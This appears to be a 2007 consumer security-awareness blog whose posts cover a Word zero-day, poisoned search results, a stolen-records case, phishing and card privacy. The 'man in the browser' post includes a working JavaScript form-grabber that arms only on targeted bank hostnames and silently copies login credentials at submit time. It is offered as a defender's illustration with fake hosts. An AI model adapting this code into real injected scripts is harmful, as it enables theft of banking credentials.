Friday, November 30, 2007

Peek? Peek? Peek a boo!

Last weekend I got to play a rousing game of "peek a boo" with my 2-year-old, cute-as-a-button niece. My kids are a little older now, so I'd forgotten how kids believe that if they cover their eyes, I'm not there.

Hmm, sounds familiar.

A few people I've spoken to lately don't know much about internet attacks, or even whether they have a firewall set up – but since they don't see the attacks, the hackers out there will somehow not get them. There is a little truth to the idea of 'security via obscurity', but ...

Boo!


I've read that over 75% of households surveyed thought they had "good" protection against viruses, spam, etc. Of these, only 30% actually did. Most were using whatever came with the computer when it was purchased, and may or may not have been applying the updates.

Here's a flow of events to think about:
Day 0. A researcher publishes a newly discovered "hole" (a vulnerability) in a device (PC, iPhone, game console) that someone could take advantage of.
Day 1. The vendor of the device begins work on a patch to plug the hole, and the anti-virus (AV) companies begin work on signatures to detect attacks on it.
Day 2. Bad guys also begin work to take advantage of the hole.
Day 3. The vendor publishes the patch and the AV companies publish their signatures.
Day 3. Bad guys release code (an exploit) that takes advantage of it.

In this scenario, if you're using a reasonable protection scheme that's updated automatically – patches installed as the vendor releases them and AV signatures kept current – you should be ok.

But what if the bad guys take advantage of a hole before the vendor has a patch or the AV companies have a signature for it? That's called a zero-day attack: the attack is in use on "day zero", before anyone defending has had a single day to respond.

Here’s one described:

The exploit arrives as an ordinary Microsoft Word document attachment to an e-mail. However, when the document is launched by the user, the vulnerability is triggered to drop a backdoor with rootkit features to mask itself from anti-virus scanners.
The SANS ISC (Internet Storm Center) said in a diary entry that it received reports of the exploit from an unnamed organization that was targeted. "The e-mail was written to look like an internal e-mail, including signature. It was addressed by name to the intended victim and not detected by the anti-virus software," said Chris Carboni, an ISC incident handler tracking the attack.
When the .doc attachment is opened, it exploits a previously unknown vulnerability in Microsoft Word and infects a fully patched Windows system. The exploit functioned as a dropper, extracting and launching a Trojan that immediately overwrites the original Word document with a "clean," uninfected copy.

"As a result of the exploit, Word crashes, informs the user of a problem, and offers to attempt to re-open the file. If the user agrees, the new 'clean' file is opened without incident," the ISC explained.

read more

Wednesday, November 28, 2007

We're not in Kansas anymore

I use the internet a lot for work - probably 50% of my time every day is spent online doing research. A lot of that research is via search engines, following links, looking things up. Perhaps I was being a little naive - but I thought that as long as I didn't go to any websites that weren't safe for work, my computer would be ok.

Then I read this

Update: Subverted search sites lead to massive malware attack in progress
Trojans, rootkits, password stealers hit users who click on a bad link after a search

November 27, 2007 (Computerworld) -- A large-scale, coordinated campaign to steer users toward malware-spewing Web sites from Google and other Internet search engines is under way, security researchers said Tuesday.

Users searching Google, Yahoo, Microsoft Live Search and other engines with any of hundreds of legitimate phrases -- from the technical "how to cisco router vpn dial in" to the heart-tugging "how to teach a dog to play fetch" -- will see links near the top of the results listings that lead directly to malicious sites hosting a mountain of malware.

"This is huge," said Alex Eckelberry, Sunbelt Software's CEO. "So far we've found 27 different domains, each with up to 1,499 [malicious] pages. That's 40,000 possible pages."
Those pages have had their search site ranking boosted by crooked tactics that include "comment spam" and "blog spam," where bots inundate the comment areas of sites with links or mass large numbers of them as bogus blog posts. Attackers may be using bots to plug links into any Web form that requests a URL, added Sunbelt malware researcher Adam Thomas.

read more

IDs! Getchur hot IDs! IDs for sale!

It's that new black market again: IDs are stolen from one place and sold on the black market to others who plan organized attacks. Yikes!

Database admin to plead guilty in theft of 8.5M consumer records
He agreed to pay restitution, cooperate with police and forfeit $105,000

November 27, 2007 (Computerworld) -- A senior database administrator at a subsidiary of Fidelity National Information Services Inc. (FIS) who was accused of stealing about 8.5 million customer records and selling them to data brokers is expected to plead guilty tomorrow to felony fraud charges in U.S. District Court in Tampa, according to court documents.
William G. Sullivan has also agreed to pay court-ordered restitution to victims, cooperate with ongoing investigations and forfeit the more than $105,000 he still has remaining from selling the stolen data. In exchange, according to a plea agreement also filed with the court, federal prosecutors are expected to recommend a reduction from the maximum five-year sentence that Sullivan could have gotten.
Sullivan worked as database administrator for Certegy Check Services Inc., a St. Petersburg, Fla.-based Fidelity subsidiary that provides a check-authorization service to financial institutions and merchants across the globe. FIS itself is a provider of transaction processing and related services to the financial industry. It is separate from the better-known Fidelity Investments.

read the full story

Tuesday, November 27, 2007

uh oh

In this story, they're describing something similar to a 'man in the middle' attack. Picture you're playing a game of 'phone' as a kid. You have a soup can, and so does your friend. They're connected by a long piece of string and you talk to each other through the cans. A 'man in the middle' attack is someone sitting in the middle of the string, listening to your conversation. A 'man in the browser' is nastier: instead of sitting on the string, the fraudster is inside your can, hearing what you say before it ever reaches the string. That's why encrypting the connection to the bank (the padlock in the browser) doesn't help here – the malware reads what you type inside the browser, before it's encrypted, and the bank sees a perfectly normal login.


'Man in the browser' is new threat to online banking
Traditional anti-malware software not likely to catch these threats quickly


November 27, 2007 (Computerworld UK) -- Criminals infecting PCs with malware that is only triggered when they access their bank accounts are the latest threat to online banking, according to security software supplier F-Secure.

Perpetrators act as a 'man in the browser' by intercepting HTML code in the Web browser. As bank security measures curb more traditional threats such as keystroke logging, phishing and pharming, F-Secure warned, the 'man in the browser' attack will increase.

Once a user's PC is infected, the malicious code is only triggered when the user visits an online bank. The 'man in the browser' attack then retrieves information, such as logins and passwords, entered on a legitimate bank site. This personal data is sent directly to an FTP site to be stored, where it is sold to the highest bidder.

read more
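To make the mechanism concrete, here is an added example in JavaScript, the language a browser-resident attacker would actually use. It is not F-Secure's or Computerworld's code and it is not real malware: the bank hostnames, the fake window/document object, the login form and the array that plays the role of the FTP drop site are all constructed for the demo. It shows the two things the article describes: the code stays dormant until the page's hostname matches a targeted bank, and at submit time it copies the form fields, password included, without stopping the real login from going through.

```javascript
// Added illustration of the "man in the browser" mechanism: browser-resident
// code that stays dormant until the page is a targeted bank, then copies the
// login form fields at submit time, after the user typed them and before the
// browser encrypts the request. Nothing here is real malware; the hostnames,
// the fake window/DOM, the login form and the "drop site" are constructed.

// Assumed list of targeted bank hostnames (constructed for the demo).
const TARGET_HOSTS = ["online.examplebank.test", "login.examplebank.test"];

// Trigger condition: only activate on a targeted host or one of its subdomains.
function shouldTrigger(hostname, targets = TARGET_HOSTS) {
  const h = String(hostname || "").toLowerCase();
  return targets.some((t) => h === t || h.endsWith("." + t));
}

// Copy name/value pairs out of a form-like object ({ elements: [...] }).
// Password fields are the whole point, so nothing is masked.
function grabFormFields(form) {
  const fields = {};
  for (const el of form.elements || []) {
    if (!el.name || el.disabled) continue;
    if (el.type === "submit" || el.type === "button") continue;
    if (el.type === "checkbox" || el.type === "radio") {
      if (el.checked) fields[el.name] = el.value;
      continue;
    }
    fields[el.name] = el.value;
  }
  return fields;
}

// Hook the submit event on a window-like object. `dropSite` stands in for the
// FTP site the article mentions; here it is just an array we can inspect.
// Returns true when the hook was installed, false when the host is not a target.
function installGrabber(win, dropSite, targets = TARGET_HOSTS) {
  const host = win.location.hostname;
  if (!shouldTrigger(host, targets)) return false;
  win.document.addEventListener("submit", (event) => {
    dropSite.push({ host, action: event.target.action, fields: grabFormFields(event.target) });
    // The submission is not cancelled: the real login still goes to the bank,
    // so the user sees nothing unusual.
  });
  return true;
}

// Minimal stand-in for window/document so the demo runs outside a browser.
function fakeWindow(hostname) {
  const listeners = {};
  return {
    location: { hostname },
    document: {
      addEventListener(type, fn) {
        (listeners[type] = listeners[type] || []).push(fn);
      },
      // Simulates the browser firing a submit event for `form`.
      dispatch(type, form) {
        (listeners[type] || []).forEach((fn) => fn({ type, target: form }));
      },
    },
  };
}

// Simulate a user logging in on `hostname` with the grabber installed.
function demo(hostname) {
  const dropSite = [];
  const win = fakeWindow(hostname);
  const armed = installGrabber(win, dropSite);
  const loginForm = {
    action: "https://" + hostname + "/login",
    elements: [
      { name: "user", type: "text", value: "alice" },
      { name: "pass", type: "password", value: "hunter2" },
      { name: "remember", type: "checkbox", checked: false, value: "1" },
      { name: "go", type: "submit", value: "Log in" },
    ],
  };
  win.document.dispatch("submit", loginForm);
  return { armed, captured: dropSite };
}

console.log(JSON.stringify(demo("online.examplebank.test"), null, 2));
console.log(JSON.stringify(demo("www.example.test"), null, 2));
```

Run it with node: the first call arms the hook and captures the username and password, the second (a non-bank site) installs nothing and captures nothing. The point for defenders is that the copy is made inside the browser before TLS, so the bank's logs show a normal login and a network capture shows only encrypted traffic; detection has to look at what is running in or alongside the browser, which is why the article's subhead warns that traditional anti-malware is unlikely to catch it quickly.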

Monday, November 26, 2007

Phishers Steal DOJ's Identity

New spam-based exploits also operate under guise of Better Business Bureau

NOVEMBER 20, 2007 -- You'd think that if you were going to commit a crime, impersonating a major law enforcement agency would be the last attack on your list. But some brassy phishers have got another idea.
According to a warning issued earlier today by Websense Security Labs, there is a new spam attack on the Web that claims to be a message from the U.S. Department of Justice.

read the full story

Caution with credit cards

With the holidays upon us, pulling out that credit card is becoming a reflex move – unfortunately, if you're concerned about identity theft, this could be hazardous.

Yesterday I was at a mall in the San Joaquin Valley needing some food for my kids. The place was packed! As I walked into the food court I realized I had a choice – I could either trust that the person behind the counter was honest or too busy/worn out from the day to care who I was, or I could use cash from the nearby ATM. "What's the difference, Dave?" By using cash I guaranteed my anonymity. If I were to hand the checkout person my card, I was giving up my name and card number.

I wouldn't normally give this much consideration, but on the radio last week I heard a guy, 'Bob', who wanted the DJs to call a girl, 'Sally', for a date. After some prodding, the DJs learned 'Sally' hadn't given Bob her phone number – he worked in a deli she frequented, and she had paid with a credit card. Using her name and a search engine, he found her personal information!

Be careful who you give your card to and be careful what you do with your personal statements.

Social engineering and dumpster diving are among the most common ways people lose their private information.